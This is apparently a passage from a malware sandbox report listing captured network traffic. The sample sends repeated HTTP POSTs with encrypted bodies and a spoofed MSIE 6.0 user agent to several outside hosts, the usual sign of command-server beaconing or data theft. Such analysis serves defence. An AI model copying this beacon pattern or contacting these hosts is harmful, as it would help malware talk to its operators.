69 70 56 78 56 76 6c 59 75 74 30 2f 39 65 43 52 42 61 69 79 49 31 47 7a 63 36 67 42 69 42 37 38 70 31 59 4e 36 62 42 71 50 6a 4c 36 47 61 4e 4e 39 4d 63 6f 6b 4e 56 47 68 6b 41 71 64 7a 37 6f 39 39 4a 4f 79 43 35 4b 48 49 48 63 59 46 4a 59 75 36 4b 4c 77 2f 4b 51 68 6f 6e 59 47 77 35 39 57 52 33 54 6a 46 62 37 65 6e 7a 4f 4d 4b 42 57 65 4c 4b 58 41 41 66 50 4f 77 79 58 36 61 2f 77 44 64 75 68 56 52 4f 32 7a 63 64 4e 76 35 55 69 70 76 61 55 43 2b 51 6e 62 55 70 4b 69 54 50 67 37 35 6d 6f 43 76 2b 44 6b 64 68 4f 62 43 4d 6d 35 46 6e 72 67 6e 32 64 46 75 59 33 6c 67 37 77 36 75 32 59 64 44 72 71 35 43 74 7a 71 37 38 6f 48 73 51 53 53 49 31 55 48 34 65 78 6b 70 79 56 65 43 66 64 77 33 62 58 33 4b 55 62 57 6d 5a 39 43 50 48 71 6f 51 52 2f 55 63 48 76 38 2f 4f 73 52 70 73 35 48 4f 71 36 38 46 42 6e 6a 45 2b 48 77 65 6d 37 77 59 36 66 31 4f 50 42 50 38 5a 47 2f 36 4b 49 6a 51 66 2f 54 45 46 66 71 53 67 44 48 30 55 4d 48 7a 44 4a 71 74 54 34 2b 58 53 41 6c 45 31 4e 33 36 62 68 54 56 36 78 61 37 71 73 38 39 69 42 50 64 43 50 45 64 33 63 47 4f 4e 55 62 44 52 72 4f 34 2b 61 44 6b 68 38 76 38 73 72 75 64 55 54 2f 53 63 6a 49 6b 68 38 50 57 45 68 5a 79 4c 6e 72 6f 64 48 75 6b 56 42 62 44 36 41 38 54 44 70 41 59 2f Data Ascii: NssKmCPVbwk3JGSJqrhzFkxzZHdJCjJiBwUu5dC/d4DLq2j8cX/2dzjSwSvv3d7dtsHl1AU3bhoMhd6MsGRO7A2lzYuDeKJHme2qrxpCoags7/zsR1IOtJpMG6+z7Oa1CNkGu0cWncYyDipVxVvlYut0/9eCRBaiyI1Gzc6gBiB78p1YN6bBqPjL6GaNN9McokNVGhkAqdz7o99JOyC5KHIHcYFJYu6KLw/KQhonYGw59WR3TjFb7enzOMKBWeLKXAAfPOwyX6a/wDduhVRO2zcdNv5UipvaUC+QnbUpKiTPg75moCv+DkdhObCMm5Fnrgn2dFuY3lg7w6u2YdDrq5Ctzq78oHsQSSI1UH4exkpyVeCfdw3bX3KUbWmZ9CPHqoQR/UcHv8/OsRps5HOq68FBnjE+Hwem7wY6f1OPBP8ZG/6KIjQf/TEFfqSgDH0UMHzDJqtT4+XSAlE1N36bhTV6xa7qs89iBPdCPEd3cGONUbDRrO4+aDkh8v8srudUT/ScjIkh8PWEhZyLnrodHukVBbD6A8TDpAY/
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 576User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.speelhal.netCache-Control: no-cacheData Raw: 59 37 63 37 6d 51 6e 66 62 77 6c 68 43 5a 62 55 57 4e 7a 62 45 53 4b 67 53 55 38 6e 53 54 46 76 54 57 4c 59 73 56 76 48 75 36 57 61 70 6e 4e 73 32 69 51 34 33 35 76 31 70 37 41 68 78 78 44 43 68 66 6f 59 34 55 6d 2f 68 58 61 67 59 64 75 49 49 75 76 33 43 66 56 4d 46 78 62 67 48 69 43 69 58 34 72 6d 53 68 45 78 4a 57 52 4e 2b 51 51 57 32 53 6e 44 41 51 58 36 51 50 43 52 36 6f 74 46 78 6c 63 59 6b 50 76 58 54 6a 75 6d 39 50 39 54 47 7a 68 56 66 4b 58 74 32 37 4b 43 63 6f 38 36 51 51 52 52 77 31 36 35 7a 4a 43 5a 4a 38 46 75 45 74 57 36 48 39 34 2b 63 59 54 61 62 64 6e 34 45 52 2f 6f 4f 50 6f 42 77 75 6a 37 4c 48 45 4f 65 62 74 75 4b 59 4c 31 75 36 53 67 53 6f 69 70 64 37 4d 4e 64 76 68 78 6f 64 49 6f 48 54 45 77 4c 4e 79 62 30 49 4d 68 61 65 78 47 5a 48 6d 46 57 55 6d 61 2b 6d 2f 77 6f 75 79 58 2b 4b 30 33 4b 55 32 79 41 6a 7a 2f 74 6a 38 58 58 67 71 6f 76 43 35 78 75 4b 48 70 69 61 34 61 42 41 2b 64 68 46 6b 57 62 68 4a 5a 43 71 7a 34 63 38 61 35 58 2f 59 72 66 6e 4b 42 57 37 30 74 6f 68 2b 62 59 66 7a 61 77 79 75 46 6b 69 34 6d 72 55 67 44 4c 5a 54 72 55 66 62 6a 4b 53 51 7a 37 37 2b 36 6e 32 71 6b 63 77 67 6c 30 61 7a 5a 30 63 37 5a 6f 4a 2b 44 38 4a 57 47 61 58 61 53 53 46 7a 70 39 66 67 63 6c 33 35 48 46 31 53 4d 6c 46 36 47 4e 6f 47 44 6b 57 79 63 30 4c 6b 78 72 56 66 6e 35 78 76 6e 58 50 47 35 66 50 30 35 31 4f 68 59 30 32 36 31 55 61 47 74 7a 6b 35 31 59 36 53 46 79 71 43 6a 61 74 31 4d 2b 5a 33 43 49 61 79 63 4d 6f 30 78 30 6d 61 34 6a 46 44 77 78 4f 39 43 30 30 57 39 6e 5a 67 36 66 73 2f 68 34 34 4a 42 61 54 6d 30 54 63 63 49 31 34 67 47 73 67 6c 39 43 72 32 59 37 2b 77 6f 7a 4d 67 72 47 63 4b 78 47 51 52 39 57 55 58 4b 53 77 51 58 58 43 51 6f 73 62 49 47 55 2b 4a 42 46 61 33 4c 59 77 3d 3d Data Ascii: Y7c7mQnfbwlhCZbUWNzbESKgSU8nSTFvTWLYsVvHu6WapnNs2iQ435v1p7AhxxDChfoY4Um/hXagYduIIuv3CfVMFxbgHiCiX4rmShExJWRN+QQW2SnDAQX6QPCR6otFxlcYkPvXTjum9P9TGzhVfKXt27KCco86QQRRw165zJCZJ8FuEtW6H94+cYTabdn4ER/oOPoBwuj7LHEOebtuKYL1u6SgSoipd7MNdvhxodIoHTEwLNyb0IMhaexGZHmFWUma+m/wouyX+K03KU2yAjz/tj8XXgqovC5xuKHpia4aBA+dhFkWbhJZCqz4c8a5X/YrfnKBW70toh+bYfzawyuFki4mrUgDLZTrUfbjKSQz77+6n2qkcwgl0azZ0c7ZoJ+D8JWGaXaSSFzp9fgcl35HF1SMlF6GNoGDkWyc0LkxrVfn5xvnXPG5fP051OhY0261UaGtzk51Y6SFyqCjat1M+Z3CIaycMo0x0ma4jFDwxO9C00W9nZg6fs/h44JBaTm0TccI14gGsgl9Cr2Y7+wozMgrGcKxGQR9WUXKSwQXXCQosbIGU+JBFa3LYw==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 592User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.edimart.huCache-Control: no-cacheData Raw: 2f 71 52 75 67 6e 73 68 62 77 6b 31 55 55 35 57 45 71 68 74 51 32 52 31 6e 64 47 42 4b 64 31 48 33 2b 4a 45 63 48 52 7a 66 56 78 6a 71 32 45 5a 65 78 66 43 77 6b 38 66 6e 62 31 4e 70 6c 6c 66 4b 50 2f 48 2b 49 6a 30 71 62 61 4a 69 33 45 44 2f 52 79 5a 46 6c 31 72 55 78 41 5a 47 6c 2f 76 74 4d 34 70 31 51 33 2b 30 6e 62 48 5a 67 69 78 54 62 36 57 2f 67 59 68 43 47 42 75 72 54 6d 4b 46 54 4d 30 32 50 63 62 39 45 79 6d 49 70 66 44 77 36 43 53 32 69 4f 6b 68 74 38 74 4f 6b 74 42 67 43 45 6d 48 31 58 51 34 6f 78 34 63 52 4d 61 68 41 58 70 38 4d 76 43 78 30 46 2f 36 77 6f 4e 77 66 43 54 43 4e 34 4f 4d 36 31 36 41 69 56 37 2f 52 6d 56 37 57 43 64 73 2b 65 4f 37 61 66 50 48 63 31 6e 31 6f 76 78 4b 66 4e 2f 55 4f 6c 42 52 36 4e 61 36 7a 65 4d 51 7a 37 67 51 73 4d 38 49 34 34 77 4c 71 58 58 51 6b 56 54 65 6d 62 55 2f 58 67 4b 6f 58 4a 47 6d 53 76 46 34 56 6e 66 78 6e 46 49 76 50 30 73 39 79 50 45 76 2f 7a 6b 4d 38 47 62 6a 42 79 74 49 4f 69 61 7a 38 55 49 6a 73 38 42 63 52 74 64 44 6a 6c 74 4b 36 6b 36 41 45 4f 4b 44 42 48 66 62 34 41 48 63 71 74 74 59 4f 32 4a 34 56 61 35 58 50 67 75 34 5a 56 66 63 2f 39 58 41 65 30 72 7a 51 65 38 35 49 7a 79 36 54 4a 65 6d 2f 32 66 66 30 34 2b 66 37 35 79 64 30 65 53 70 39 66 70 70 53 54 7a 78 33 34 32 61 63 5a 66 2f 75 74 6c 45 72 51 72 2f 2f 53 75 77 4c 2f 67 78 6d 37 55 31 37 6f 37 56 47 6b 61 67 58 2b 79 79 36 31 66 51 53 41 46 4c 49 42 54 36 6e 70 51 52 4b 44 79 49 31 2f 4e 57 63 6a 2b 44 77 5a 78 76 6d 39 68 75 63 61 65 68 58 44 4f 37 71 51 70 48 5a 72 63 63 43 64 53 4e 59 50 4c 65 35 41 67 43 6d 75 38 39 70 37 5a 58 79 4c 5a 33 58 71 33 2b 5a 42 73 64 47 43 47 74 2f 53 36 72 63 59 6b 5a 51 4d 65 30 58 37 73 48 47 43 6f 67 61 38 7a 4c 4a 49 69 6a 69 6b 55 41 43 57 6e 6a 74 75 45 69 30 69 41 42 6b 73 4d 44 77 3d 3d Data Ascii: /qRugnshbwk1UU5WEqhtQ2R1ndGBKd1H3+JEcHRzfVxjq2EZexfCwk8fnb1NpllfKP/H+Ij0qbaJi3ED/RyZFl1rUxAZGl/vtM4p1Q3+0nbHZgixTb6W/gYhCGBurTmKFTM02Pcb9EymIpfDw6CS2iOkht8tOktBgCEmH1XQ4ox4cRMahAXp8MvCx0F/6woNwfCTCN4OM616AiV7/RmV7WCds+eO7afPHc1n1ovxKfN/UOlBR6Na6zeMQz7gQsM8I44wLqXXQkVTembU/XgKoXJGmSvF4VnfxnFIvP0s9yPEv/zkM8GbjBytIOiaz8UIjs8BcRtdDjltK6k6AEOKDBHfb4AHcqttYO2J4Va5XPgu4ZVfc/9XAe0rzQe85Izy6TJem/2ff04+f75yd0eSp9fppSTzx342acZf/utlErQr//SuwL/gxm7U17o7VGkagX+yy61fQSAFLIBT6npQRKDyI1/NWcj+DwZxvm9hucaehXDO7qQpHZrccCdSNYPLe5AgCmu89p7ZXyLZ3Xq3+ZBsdGCGt/S6rcYkZQMe0X7sHGCoga8zLJIijikUACWnjtuEi0iABksMDw==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 540User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.holleman.usCache-Control: no-cacheData Raw: 79 55 66 67 67 30 44 64 5a 67 6c 63 39 48 48 34 45 36 38 50 54 6e 4d 36 75 35 6b 6f 56 5a 41 6d 64 4d 41 68 6f 31 53 6b 51 57 30 63 67 6e 69 71 48 7a 74 41 59 33 6d 4f 77 6b 78 7a 55 32 4b 2b 4a 57 73 37 57 72 6e 6a 64 4c 47 38 50 67 41 6c 71 63 32 35 53 32 77 4f 31 57 76 41 4c 6a 4c 51 4e 61 2b 50 52 2f 57 37 64 4c 38 47 73 49 36 42 77 56 63 43 54 6b 57 44 45 71 35 70 35 4d 77 52 50 79 4f 4f 48 7a 37 79 78 66 47 35 64 72 33 4b 2f 55 79 58 79 34 45 6b 33 4c 74 6f 65 51 32 4d 55 68 36 69 41 42 67 61 39 4b 75 36 69 78 70 55 66 41 68 61 38 78 6e 6e 38 4a 59 48 6f 7a 4d 36 37 75 74 75 67 2f 6d 2b 6e 2b 4c 32 59 76 77 61 4b 6d 66 59 75 31 46 46 55 7a 4f 4a 31 38 41 6e 4c 53 38 30 44 63 66 48 73 4b 73 5a 68 49 78 4f 69 58 72 74 73 56 70 36 71 47 64 59 67 63 61 4c 52 36 56 74 2f 56 2b 30 73 5a 59 41 72 75 74 2b 46 75 33 54 77 7a 54 67 68 34 57 31 68 5a 47 77 4b 6c 4f 6d 6f 57 35 48 37 61 73 79 76 48 46 6f 4c 57 62 31 4c 74 53 64 41 32 63 55 55 56 76 50 2b 2f 32 6b 57 62 62 36 53 43 47 7a 68 2b 38 51 38 48 67 62 4b 75 72 77 51 41 37 6c 6b 43 2b 34 46 74 61 6a 64 4c 55 63 54 47 67 7a 6c 36 4b 65 47 48 6f 49 32 4c 55 56 4f 2b 4e 32 79 4a 62 75 54 30 69 6c 74 6b 55 69 6c 58 65 71 44 6b 75 35 63 35 78 6a 6a 72 77 46 59 33 64 30 4d 73 4a 50 2f 56 71 70 44 4f 7a 69 38 55 59 79 4f 33 61 38 32 72 4d 30 74 51 54 4e 43 74 38 2f 74 2b 73 4a 56 58 53 70 71 75 77 74 61 44 56 48 6a 55 37 6c 44 4e 32 4f 33 56 4d 66 70 75 64 57 44 6a 69 61 69 43 56 48 49 6f 62 6c 52 77 6e 62 57 56 73 4c 51 4c 73 72 61 6a 51 57 34 59 54 61 68 79 54 58 73 70 56 6b 79 31 54 30 4c 52 54 73 61 66 4d 76 45 59 72 36 6b 6d 31 73 76 6d 59 3d Data Ascii: yUfgg0DdZglc9HH4E68PTnM6u5koVZAmdMAho1SkQW0cgniqHztAY3mOwkxzU2K+JWs7WrnjdLG8PgAlqc25S2wO1WvALjLQNa+PR/W7dL8GsI6BwVcCTkWDEq5p5MwRPyOOHz7yxfG5dr3K/UyXy4Ek3LtoeQ2MUh6iABga9Ku6ixpUfAha8xnn8JYHozM67utug/m+n+L2YvwaKmfYu1FFUzOJ18AnLS80DcfHsKsZhIxOiXrtsVp6qGdYgcaLR6Vt/V+0sZYArut+Fu3TwzTgh4W1hZGwKlOmoW5H7asyvHFoLWb1LtSdA2cUUVvP+/2kWbb6SCGzh+8Q8HgbKurwQA7lkC+4FtajdLUcTGgzl6KeGHoI2LUVO+N2yJbuT0iltkUilXeqDku5c5xjjrwFY3d0MsJP/VqpDOzi8UYyO3a82rM0tQTNCt8/t+sJVXSpquwtaDVHjU7lDN2O3VMfpudWDjiaiCVHIoblRwnbWVsLQLsrajQW4YTahyTXspVky1T0LRTsafMvEYr6km1svmY=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 576User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.yocinc.orgCache-Control: no-cacheData Raw: 63 61 50 34 65 76 70 43 58 67 6d 6f 62 58 72 75 6e 66 5a 52 7a 7a 30 36 54 48 4e 71 33 70 48 7a 7a 6e 7a 32 65 62 44 43 6e 52 4a 71 50 44 2b 7a 59 33 4a 42 6b 44 48 77 69 30 6f 78 66 54 51 47 6d 35 79 74 54 6b 64 48 41 5a 4a 67 6a 58 30 6e 75 38 31 50 38 44 66 54 37 6a 71 32 50 79 54 6b 47 49 50 6f 36 6d 35 49 36 30 32 30 35 78 4a 43 38 39 76 55 61 57 6b 47 71 64 64 49 56 52 65 6e 6f 44 79 6d 70 73 52 38 35 44 54 30 35 4f 69 7a 63 61 2b 36 52 70 33 4f 44 31 36 4e 76 32 68 64 50 65 48 7a 6d 50 42 42 4d 4f 56 6a 2f 58 37 73 61 72 55 41 35 35 65 4f 78 41 4b 56 6f 79 4e 54 57 37 73 69 46 31 6c 32 45 50 32 49 76 56 65 70 72 5a 62 4a 35 4c 6d 33 4e 31 59 47 74 38 74 47 63 77 70 30 5a 51 72 4d 47 52 43 2b 33 48 36 64 7a 54 47 52 79 4a 2b 32 68 59 41 58 36 57 67 7a 4f 30 42 31 45 50 6f 77 55 2b 42 70 34 49 67 72 2b 69 71 5a 33 71 51 76 64 72 34 71 72 76 4a 4f 46 31 39 48 71 62 4d 6b 68 2f 51 5a 35 43 5a 58 41 4e 4f 6c 31 75 38 36 72 6e 71 53 41 35 53 68 76 53 57 45 4d 48 64 74 68 7a 66 50 44 57 53 56 74 52 69 45 4e 6f 72 6f 56 6c 59 52 66 54 65 76 76 71 47 6b 34 31 78 2b 5a 7a 68 53 35 75 44 34 64 6e 7a 66 34 43 69 74 69 54 4a 73 4b 78 54 63 39 39 4c 33 44 30 56 57 61 34 68 68 4c 6c 54 62 41 44 64 43 33 65 5a 6e 54 49 61 4c 63 50 36 6b 69 38 58 2b 45 44 42 54 6c 2b 58 58 56 6e 65 33 43 30 4e 43 41 65 4f 51 47 57 66 6b 43 71 38 37 58 62 33 67 70 53 4a 4a 76 49 47 5a 6d 59 65 54 38 79 4c 5a 4e 70 46 5a 76 48 4a 75 57 65 48 57 33 76 46 30 56 66 76 48 43 79 42 47 31 56 2f 4f 37 30 44 76 41 30 4b 49 33 62 4e 68 6a 51 47 7a 77 38 46 51 42 6e 74 68 48 56 46 52 73 4e 63 37 76 31 79 69 4c 6f 4d 42 75 50 69 78 32 78 54 2b 47 63 76 46 79 64 4d 79 6d 2b 2b 52 75 39 58 76 73 36 54 57 6a 2f 76 51 49 6d 39 4a 4a 45 59 3d Data Ascii: caP4evpCXgmobXrunfZRzz06THNq3pHzznz2ebDCnRJqPD+zY3JBkDHwi0oxfTQGm5ytTkdHAZJgjX0nu81P8DfT7jq2PyTkGIPo6m5I60205xJC89vUaWkGqddIVRenoDympsR85DT05Oizca+6Rp3OD16Nv2hdPeHzmPBBMOVj/X7sarUA55eOxAKVoyNTW7siF1l2EP2IvVeprZbJ5Lm3N1YGt8tGcwp0ZQrMGRC+3H6dzTGRyJ+2hYAX6WgzO0B1EPowU+Bp4Igr+iqZ3qQvdr4qrvJOF19HqbMkh/QZ5CZXANOl1u86rnqSA5ShvSWEMHdthzfPDWSVtRiENoroVlYRfTevvqGk41x+ZzhS5uD4dnzf4CitiTJsKxTc99L3D0VWa4hhLlTbADdC3eZnTIaLcP6ki8X+EDBTl+XXVne3C0NCAeOQGWfkCq87Xb3gpSJJvIGZmYeT8yLZNpFZvHJuWeHW3vF0VfvHCyBG1V/O70DvA0KI3bNhjQGzw8FQBnthHVFRsNc7v1yiLoMBuPix2xT+GcvFydMym++Ru9Xvs6TWj/vQIm9JJEY=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 552User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.stnic.co.ukCache-Control: no-cacheData Raw: 78 45 75 6d 6a 6b 72 58 64 77 6c 57 58 51 75 5a 72 56 36 47 66 51 33 6a 2b 31 62 36 51 42 44 39 48 71 34 59 68 77 49 30 41 77 38 4b 65 44 66 69 35 57 7a 6a 2b 75 7a 4e 43 42 57 50 4b 68 4f 68 47 35 50 78 56 52 5a 4e 54 4b 34 56 54 53 36 4d 41 36 41 4a 79 48 71 66 55 54 7a 77 70 79 4b 70 56 77 4a 57 2b 45 62 66 66 7a 64 51 4b 41 4e 73 78 42 72 6b 77 36 56 34 2b 55 53 38 55 32 49 52 38 38 4d 6e 30 54 53 77 53 6c 58 6e 37 6a 43 52 62 46 49 4a 59 35 63 42 32 6b 79 68 4c 45 39 67 2b 56 55 42 70 59 6a 5a 68 39 35 61 6b 75 6a 34 49 35 35 6b 79 6b 7a 76 39 4c 46 52 48 75 2b 33 76 4f 61 4c 36 45 4a 51 38 31 42 72 38 4f 6f 6d 65 74 66 46 30 31 67 41 55 66 36 4f 32 51 53 52 76 74 77 37 6e 75 75 44 53 57 6f 70 67 70 67 32 38 4d 63 47 6d 52 4c 6e 32 6a 68 50 72 34 34 55 6c 52 33 6b 73 33 57 4d 44 33 75 68 4d 4e 73 64 74 43 64 33 2f 48 33 4e 55 55 75 68 70 64 6e 4d 57 30 65 58 66 36 69 4c 54 76 65 7a 68 6e 6e 38 51 35 6b 75 76 45 46 33 56 44 35 45 70 41 4b 74 79 61 6c 56 30 57 64 5a 39 6b 6b 78 72 63 4c 63 63 48 44 49 42 53 4f 76 52 6f 54 7a 49 43 4f 61 31 41 47 36 61 34 36 6d 4a 71 77 7a 37 5a 50 53 57 77 53 65 52 4a 2b 76 55 59 75 41 73 45 37 45 76 54 72 77 63 4b 47 36 34 56 67 44 37 51 46 48 56 76 76 2b 66 53 76 57 4c 73 6f 70 59 49 70 30 32 4f 39 77 2b 7a 46 2f 4b 31 38 34 5a 48 6e 35 33 6d 61 71 36 33 63 55 39 74 77 57 4d 58 69 6e 53 4f 67 63 35 64 46 4c 73 47 71 4b 6f 49 45 2b 36 44 36 72 37 65 78 6f 74 63 4e 45 2f 37 37 31 37 56 39 6d 67 45 4d 76 62 66 63 65 57 71 79 77 6c 69 70 54 43 72 67 65 37 48 78 6f 6e 67 5a 63 73 46 4d 39 42 42 68 53 42 42 58 76 36 4b 42 2f 38 6d 6a 77 72 59 4b 30 39 44 79 4c 6b 64 54 57 58 61 64 5a 64 51 67 3d Data Ascii: xEumjkrXdwlWXQuZrV6GfQ3j+1b6QBD9Hq4YhwI0Aw8KeDfi5Wzj+uzNCBWPKhOhG5PxVRZNTK4VTS6MA6AJyHqfUTzwpyKpVwJW+EbffzdQKANsxBrkw6V4+US8U2IR88Mn0TSwSlXn7jCRbFIJY5cB2kyhLE9g+VUBpYjZh95akuj4I55kykzv9LFRHu+3vOaL6EJQ81Br8OometfF01gAUf6O2QSRvtw7nuuDSWopgpg28McGmRLn2jhPr44UlR3ks3WMD3uhMNsdtCd3/H3NUUuhpdnMW0eXf6iLTvezhnn8Q5kuvEF3VD5EpAKtyalV0WdZ9kkxrcLccHDIBSOvRoTzICOa1AG6a46mJqwz7ZPSWwSeRJ+vUYuAsE7EvTrwcKG64VgD7QFHVvv+fSvWLsopYIp02O9w+zF/K184ZHn53maq63cU9twWMXinSOgc5dFLsGqKoIE+6D6r7exotcNE/7717V9mgEMvbfceWqywlipTCrge7HxongZcsFM9BBhSBBXv6KB/8mjwrYK09DyLkdTWXadZdQg=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 552User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.stnic.co.ukCache-Control: no-cacheData Raw: 78 45 75 6d 6a 6b 72 58 64 77 6c 57 58 51 75 5a 72 56 36 47 66 51 33 6a 2b 31 62 36 51 42 44 39 48 71 34 59 68 77 49 30 41 77 38 4b 65 44 66 69 35 57 7a 6a 2b 75 7a 4e 43 42 57 50 4b 68 4f 68 47 35 50 78 56 52 5a 4e 54 4b 34 56 54 53 36 4d 41 36 41 4a 79 48 71 66 55 54 7a 77 70 79 4b 70 56 77 4a 57 2b 45 62 66 66 7a 64 51 4b 41 4e 73 78 42 72 6b 77 36 56 34 2b 55 53 38 55 32 49 52 38 38 4d 6e 30 54 53 77 53 6c 58 6e 37 6a 43 52 62 46 49 4a 59 35 63 42 32 6b 79 68 4c 45 39 67 2b 56 55 42 70 59 6a 5a 68 39 35 61 6b 75 6a 34 49 35 35 6b 79 6b 7a 76 39 4c 46 52 48 75 2b 33 76 4f 61 4c 36 45 4a 51 38 31 42 72 38 4f 6f 6d 65 74 66 46 30 31 67 41 55 66 36 4f 32 51 53 52 76 74 77 37 6e 75 75 44 53 57 6f 70 67 70 67 32 38 4d 63 47 6d 52 4c 6e 32 6a 68 50 72 34 34 55 6c 52 33 6b 73 33 57 4d 44 33 75 68 4d 4e 73 64 74 43 64 33 2f 48 33 4e 55 55 75 68 70 64 6e 4d 57 30 65 58 66 36 69 4c 54 76 65 7a 68 6e 6e 38 51 35 6b 75 76 45 46 33 56 44 35 45 70 41 4b 74 79 61 6c 56 30 57 64 5a 39 6b 6b 78 72 63 4c 63 63 48 44 49 42 53 4f 76 52 6f 54 7a 49 43 4f 61 31 41 47 36 61 34 36 6d 4a 71 77 7a 37 5a 50 53 57 77 53 65 52 4a 2b 76 55 59 75 41 73 45 37 45 76 54 72 77 63 4b 47 36 34 56 67 44 37 51 46 48 56 76 76 2b 66 53 76 57 4c 73 6f 70 59 49 70 30 32 4f 39 77 2b 7a 46 2f 4b 31 38 34 5a 48 6e 35 33 6d 61 71 36 33 63 55 39 74 77 57 4d 58 69 6e 53 4f 67 63 35 64 46 4c 73 47 71 4b 6f 49 45 2b 36 44 36 72 37 65 78 6f 74 63 4e 45 2f 37 37 31 37 56 39 6d 67 45 4d 76 62 66 63 65 57 71 79 77 6c 69 70 54 43 72 67 65 37 48 78 6f 6e 67 5a 63 73 46 4d 39 42 42 68 53 42 42 58 76 36 4b 42 2f 38 6d 6a 77 72 59 4b 30 39 44 79 4c 6b 64 54 57 58 61 64 5a 64 51 67 3d Data Ascii: xEumjkrXdwlWXQuZrV6GfQ3j+1b6QBD9Hq4YhwI0Aw8KeDfi5Wzj+uzNCBWPKhOhG5PxVRZNTK4VTS6MA6AJyHqfUTzwpyKpVwJW+EbffzdQKANsxBrkw6V4+US8U2IR88Mn0TSwSlXn7jCRbFIJY5cB2kyhLE9g+VUBpYjZh95akuj4I55kykzv9LFRHu+3vOaL6EJQ81Br8OometfF01gAUf6O2QSRvtw7nuuDSWopgpg28McGmRLn2jhPr44UlR3ks3WMD3uhMNsdtCd3/H3NUUuhpdnMW0eXf6iLTvezhnn8Q5kuvEF3VD5EpAKtyalV0WdZ9kkxrcLccHDIBSOvRoTzICOa1AG6a46mJqwz7ZPSWwSeRJ+vUYuAsE7EvTrwcKG64VgD7QFHVvv+fSvWLsopYIp02O9w+zF/K184ZHn53maq63cU9twWMXinSOgc5dFLsGqKoIE+6D6r7exotcNE/7717V9mgEMvbfceWqywlipTCrge7HxongZcsFM9BBhSBBXv6KB/8mjwrYK09DyLkdTWXadZdQg=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 600User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.cel-cpa.comCache-Control: no-cacheData Raw: 49 43 71 67 4e 46 50 72 64 41 6e 62 44 36 7a 49 47 76 67 38 53 50 78 55 4f 58 6b 35 52 4c 61 37 4e 79 62 46 71 78 39 70 48 78 78 4d 51 52 6b 61 2b 4a 76 59 75 67 43 30 42 4d 72 38 78 4a 51 37 78 41 4e 74 39 4b 6e 74 52 6c 74 6f 43 77 36 4a 32 72 6e 61 34 71 5a 59 2f 64 6c 55 56 48 72 49 44 43 6e 37 47 62 4b 61 41 2f 70 4f 75 2f 75 62 74 37 41 75 57 54 31 35 46 33 58 37 70 4f 43 71 72 41 31 72 56 6f 50 52 64 31 6e 2b 39 75 45 66 31 33 62 48 69 38 51 49 64 72 4b 49 68 50 44 48 69 38 31 4c 76 55 70 39 49 39 4a 47 69 74 54 4d 64 66 64 74 35 2b 4b 65 73 4a 48 76 64 76 41 38 4b 49 46 33 6a 4e 57 53 55 44 35 34 2f 57 41 43 49 42 4f 42 39 55 38 6d 51 78 59 2b 38 52 4d 61 46 31 35 61 47 64 47 4e 71 5a 4b 36 2b 43 35 38 59 6b 66 76 61 6a 31 69 30 51 4f 6c 41 73 49 64 53 4a 53 4b 59 2b 74 45 37 75 79 63 47 70 6c 48 38 32 79 6e 63 50 51 78 73 73 48 71 6b 50 32 2b 78 4f 67 56 66 75 59 41 47 4a 68 45 77 6e 59 54 74 35 4c 75 47 41 51 78 39 4e 55 45 64 49 7a 75 57 72 41 39 38 46 52 37 4c 58 64 53 59 74 6b 70 73 2f 35 37 47 4f 51 62 36 66 71 6f 63 69 53 52 6f 2f 62 54 41 53 47 6d 4d 61 6e 73 64 67 4f 73 42 58 50 47 41 5a 49 53 58 47 51 77 45 53 41 4c 35 53 4a 6c 45 4f 38 47 31 54 76 55 45 4d 58 52 6a 61 30 45 69 63 4f 31 75 45 43 75 6a 6c 37 70 36 62 79 75 65 32 30 50 64 68 51 4a 54 31 71 53 4a 30 6a 6b 62 6c 78 65 35 54 39 2b 61 62 68 6c 33 77 79 46 32 73 64 42 45 53 73 63 73 4e 51 63 4e 6f 5a 72 76 63 47 2b 33 4b 45 48 72 68 56 4e 76 65 44 44 47 4e 77 4b 36 51 57 53 2f 4e 64 4a 33 66 58 6b 32 36 37 47 4b 76 37 78 57 4f 48 4e 4c 63 6f 65 2b 2f 53 35 6e 32 37 79 71 6c 58 52 32 59 44 64 33 70 45 4b 70 48 6c 73 45 64 79 58 62 42 65 4e 76 4f 36 76 32 6b 37 63 72 2b 58 78 4b 6e 77 48 41 72 6d 75 70 41 5a 30 65 63 4e 68 2b 43 55 75 55 56 33 39 4f 64 38 38 6b 30 31 47 4d 35 68 58 39 52 6c 30 Data Ascii: 